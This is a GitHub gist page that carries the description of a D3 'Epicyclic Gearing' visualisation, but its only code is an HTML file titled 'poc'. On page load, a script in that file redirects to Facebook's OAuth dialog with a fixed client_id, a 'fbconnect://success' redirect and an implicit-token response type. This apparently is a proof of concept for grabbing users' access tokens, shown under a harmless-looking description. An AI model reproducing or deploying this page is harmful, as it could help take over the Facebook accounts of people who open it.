Skip to content

Instantly share code, notes, and snippets.

@MohamedTarekq
Forked from mbostock/.block
Last active April 19, 2022 19:43
Show Gist options
  • Save MohamedTarekq/a37cd0f621d0a727fc7de0bc965d0519 to your computer and use it in GitHub Desktop.
Save MohamedTarekq/a37cd0f621d0a727fc7de0bc965d0519 to your computer and use it in GitHub Desktop.
Epicyclic Gearing
license: gpl-3.0
redirect: https://observablehq.com/@mbostock/epicyclic-gearing

From Wikipedia:

Epicyclic gearing or planetary gearing is a gear system consisting of one or more outer gears, or planet gears, revolving about a central, or sun gear. … Epicyclic gearing systems also incorporate the use of an outer ring gear or annulus, which meshes with the planet gears.

Use the menu in the top-left to change the frame of reference, fixing the specified gear in-place.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>poc</title>
</head>
<body>
<script>document.location="https://m.facebook.com/v5.0/dialog/oauth?client_id=154338725051675&redirect_uri=fbconnect://success&response_type=token%2Csigned_request"</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment